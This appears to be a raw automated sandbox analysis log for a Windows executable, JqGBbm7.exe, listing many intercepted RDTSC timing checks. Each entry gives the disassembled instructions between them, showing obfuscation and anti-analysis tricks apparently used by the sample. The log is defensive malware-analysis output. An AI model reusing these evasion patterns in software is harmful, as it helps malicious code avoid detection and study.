Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9B9BE second address: B9B9EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F88h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007FC064DD4F7Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9B9EA second address: B9B9F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DA37BBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9B9F9 second address: B9B9FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9B9FD second address: B9BA0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FC064DA37B8h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E304 second address: B9E333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov cx, bx 0x0000000c push 00000000h 0x0000000e jg 00007FC064DD4F7Ch 0x00000014 call 00007FC064DD4F79h 0x00000019 pushad 0x0000001a jno 00007FC064DD4F78h 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E333 second address: B9E33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E33F second address: B9E37D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC064DD4F7Fh 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edx 0x00000011 pushad 0x00000012 jns 00007FC064DD4F76h 0x00000018 jg 00007FC064DD4F76h 0x0000001e popad 0x0000001f pop edx 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FC064DD4F80h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E37D second address: B9E393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC064DA37C2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E393 second address: B9E3B8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC064DD4F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC064DD4F82h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E3B8 second address: B9E478 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC064DA37BBh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 pop eax 0x00000011 jnc 00007FC064DA37CCh 0x00000017 mov dword ptr [ebp+122D238Fh], esi 0x0000001d push 00000003h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007FC064DA37B8h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 mov edx, dword ptr [ebp+122D37F1h] 0x0000003f push 00000000h 0x00000041 mov edi, dword ptr [ebp+122D39FDh] 0x00000047 mov edx, dword ptr [ebp+122D1D27h] 0x0000004d push 00000003h 0x0000004f sub dword ptr [ebp+122D2FB0h], ecx 0x00000055 call 00007FC064DA37B9h 0x0000005a jmp 00007FC064DA37C5h 0x0000005f push eax 0x00000060 jnl 00007FC064DA37D1h 0x00000066 pushad 0x00000067 jmp 00007FC064DA37C7h 0x0000006c push ebx 0x0000006d pop ebx 0x0000006e popad 0x0000006f mov eax, dword ptr [esp+04h] 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 push edx 0x00000077 pop edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E478 second address: B9E4DF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jg 00007FC064DD4F76h 0x0000000d pop ebx 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007FC064DD4F7Eh 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jmp 00007FC064DD4F7Bh 0x0000001f pop eax 0x00000020 push 00000000h 0x00000022 push esi 0x00000023 call 00007FC064DD4F78h 0x00000028 pop esi 0x00000029 mov dword ptr [esp+04h], esi 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc esi 0x00000036 push esi 0x00000037 ret 0x00000038 pop esi 0x00000039 ret 0x0000003a lea ebx, dword ptr [ebp+1244B1D3h] 0x00000040 mov dx, di 0x00000043 push eax 0x00000044 mov edi, dword ptr [ebp+122D3AFDh] 0x0000004a pop ecx 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E4DF second address: B9E4E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E4E3 second address: B9E4E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E4E7 second address: B9E4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E4ED second address: B9E4F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E55B second address: B9E59C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 mov edi, 10D5CA12h 0x0000000d push 00000000h 0x0000000f pushad 0x00000010 mov ecx, dword ptr [ebp+122D386Dh] 0x00000016 call 00007FC064DA37C5h 0x0000001b mov ebx, dword ptr [ebp+122D37B5h] 0x00000021 pop ebx 0x00000022 popad 0x00000023 call 00007FC064DA37B9h 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b push ebx 0x0000002c pop ebx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E59C second address: B9E5A6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E5A6 second address: B9E5B8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC064DA37B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E5B8 second address: B9E5E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC064DD4F84h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007FC064DD4F78h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E5E0 second address: B9E5FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC064DA37C6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E5FA second address: B9E61F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jl 00007FC064DD4F7Eh 0x00000010 ja 00007FC064DD4F78h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jbe 00007FC064DD4F76h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E61F second address: B9E673 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 sub dword ptr [ebp+122D1D09h], ebx 0x0000000e push 00000003h 0x00000010 mov dword ptr [ebp+122D1D62h], ebx 0x00000016 sub dword ptr [ebp+122D1CDFh], edx 0x0000001c push 00000000h 0x0000001e mov esi, 6B68365Bh 0x00000023 push 00000003h 0x00000025 jmp 00007FC064DA37C1h 0x0000002a call 00007FC064DA37B9h 0x0000002f push edx 0x00000030 pushad 0x00000031 jmp 00007FC064DA37C1h 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E673 second address: B9E6BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 jmp 00007FC064DD4F83h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FC064DD4F87h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC064DD4F7Eh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E6BA second address: B9E6DD instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC064DA37B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC064DA37BFh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E6DD second address: B9E6E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E6E1 second address: B9E6E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E6E7 second address: B9E6F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC064DD4F76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E803 second address: B9E8AC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 add dword ptr [esp], 44D2CE66h 0x0000000e jnc 00007FC064DA37BBh 0x00000014 mov ecx, 31249782h 0x00000019 push 00000003h 0x0000001b jns 00007FC064DA37BAh 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 pushad 0x00000025 mov cx, si 0x00000028 jmp 00007FC064DA37C9h 0x0000002d popad 0x0000002e pop edi 0x0000002f xor esi, dword ptr [ebp+122D37F1h] 0x00000035 push 00000003h 0x00000037 jne 00007FC064DA37BCh 0x0000003d push 76A10C8Ah 0x00000042 jmp 00007FC064DA37C4h 0x00000047 add dword ptr [esp], 495EF376h 0x0000004e push edx 0x0000004f mov dword ptr [ebp+122D2465h], esi 0x00000055 pop edi 0x00000056 lea ebx, dword ptr [ebp+1244B1E7h] 0x0000005c je 00007FC064DA37C5h 0x00000062 jmp 00007FC064DA37BFh 0x00000067 xchg eax, ebx 0x00000068 push eax 0x00000069 push edx 0x0000006a jng 00007FC064DA37BCh 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E8AC second address: B9E8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9E8B0 second address: B9E8B5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B8AF71 second address: B8AFA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC064DD4F76h 0x0000000a pop esi 0x0000000b jmp 00007FC064DD4F88h 0x00000010 push eax 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jbe 00007FC064DD4F76h 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B8AFA2 second address: B8AFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BBEAC2 second address: BBEAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 jmp 00007FC064DD4F84h 0x0000000c pushad 0x0000000d jmp 00007FC064DD4F7Bh 0x00000012 jc 00007FC064DD4F76h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d push esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BBF061 second address: BBF067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BBF067 second address: BBF07C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC064DD4F76h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FC064DD4F76h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BBF1D2 second address: BBF1EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC064DA37C6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BBF1EC second address: BBF212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC064DD4F84h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BBF4E2 second address: BBF507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FC064DA37BCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BBF507 second address: BBF523 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FC064DD4F76h 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FC064DD4F7Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BBF6C6 second address: BBF6D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BBF6D8 second address: BBF6E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC064DD4F76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BBF84A second address: BBF861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007FC064DA37BAh 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BBF861 second address: BBF867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BBF9CB second address: BBF9F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FC064DA37C8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BBF9F2 second address: BBF9F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BBFDD8 second address: BBFDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BC41F3 second address: BC4205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC064DD4F7Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BC4205 second address: BC4222 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC064DA37B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jc 00007FC064DA37B6h 0x00000016 jp 00007FC064DA37B6h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCAE56 second address: BCAE5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCAE5A second address: BCAE63 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCAFF4 second address: BCB015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FC064DD4F87h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCB015 second address: BCB020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCB020 second address: BCB024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B94FC2 second address: B94FC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B94FC9 second address: B94FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC064DD4F85h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B94FE9 second address: B94FED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B94FED second address: B95027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007FC064DD4F76h 0x0000000d jmp 00007FC064DD4F85h 0x00000012 jmp 00007FC064DD4F87h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B95027 second address: B9502E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCE4A3 second address: BCE522 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC064DD4F7Eh 0x00000008 jns 00007FC064DD4F76h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xor dword ptr [esp], 2FD55F69h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FC064DD4F78h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 call 00007FC064DD4F79h 0x00000037 pushad 0x00000038 jmp 00007FC064DD4F80h 0x0000003d push edx 0x0000003e push eax 0x0000003f pop eax 0x00000040 pop edx 0x00000041 popad 0x00000042 push eax 0x00000043 jbe 00007FC064DD4F7Ch 0x00000049 pushad 0x0000004a push ebx 0x0000004b pop ebx 0x0000004c push ebx 0x0000004d pop ebx 0x0000004e popad 0x0000004f mov eax, dword ptr [esp+04h] 0x00000053 pushad 0x00000054 pushad 0x00000055 jc 00007FC064DD4F76h 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCE522 second address: BCE540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FC064DA37B8h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007FC064DA37BCh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCE540 second address: BCE573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC064DD4F87h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCEA12 second address: BCEA16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCF0BE second address: BCF0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCF0C2 second address: BCF0D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCF0D0 second address: BCF0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCF0D9 second address: BCF0DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCF1B1 second address: BCF1C1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC064DD4F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCF352 second address: BCF357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCF357 second address: BCF35D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCF35D second address: BCF381 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCF381 second address: BCF399 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DD4F84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCF5B7 second address: BCF5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC064DA37B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCF76C second address: BCF770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: BCFD35 second address: BCFD4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC064DA37C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
